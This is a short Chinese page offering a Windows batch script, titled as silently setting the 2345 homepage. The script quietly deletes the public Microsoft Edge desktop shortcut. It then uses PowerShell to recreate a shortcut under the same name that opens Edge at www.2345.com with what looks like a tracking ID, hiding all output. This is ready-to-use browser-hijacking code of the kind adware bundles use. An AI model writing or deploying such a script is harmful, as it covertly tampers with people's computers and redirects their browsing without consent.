A-A+
静默设置2345主页
- @echo off
- :: 静默删除公共桌面快捷方式
- del /f /q "C:\Users\Public\Desktop\Microsoft Edge.lnk" >nul 2>&1
- :: 使用 PowerShell 创建当前用户桌面快捷方式
- powershell -Command "$s=(New-Object -COM WScript.Shell).CreateShortcut([Environment]::GetFolderPath('Desktop')+'\Microsoft Edge.lnk');$s.TargetPath='C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe';$s.Arguments='www.2345.com/?k9846112';$s.Save()" >nul 2>&1